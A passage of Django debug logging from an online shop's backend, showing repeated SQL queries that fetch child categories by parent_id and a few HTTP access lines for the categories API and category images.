"shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:12:44,160 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:12:44,164 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:12:44,168 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:12:44,172 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:12:44,176 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:12:44,182 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:12:44,186 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:12:44,190 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:12:44,193 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:12:44,197 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:12:44,203 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:12:44,207 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:12:44,211 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:12:44,215 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:12:44,219 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:12:44,225 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:12:44,229 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:12:44,233 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:12:44,238 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:12:44,244 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:12:44,250 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:12:44,258 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:12:44,263 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:12:44,267 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:12:44,271 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:12:44,275 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:12:44,281 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:12:44,285 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:12:44,289 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:12:44,293 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:12:44,297 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:12:44,303 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:12:44,307 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:12:44,311 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:12:44,315 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:12:44,319 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:12:44,323 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:12:44,327 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:12:44,331 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:12:44,335 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:12:44,340 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:12:44,344 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:12:44] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 07:12:44] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [27/Dec/2019 07:12:44] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 DEBUG 2019-12-27 07:12:47,566 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:12:47,573 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:12:47,577 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:12:47,579 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:12:47,583 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:12:47,586 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:12:47,588 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:12:47,591 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:12:47,594 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:12:47,597 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:12:47,600 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:12:47,602 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:12:47,605 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:12:47,608 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:12:47,612 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:12:47,615 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:12:47,618 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:12:47,620 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:12:47,623 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:12:47,627 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:12:47,630 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:12:47,634 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:12:47,639 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:12:47,643 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:12:47,647 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", 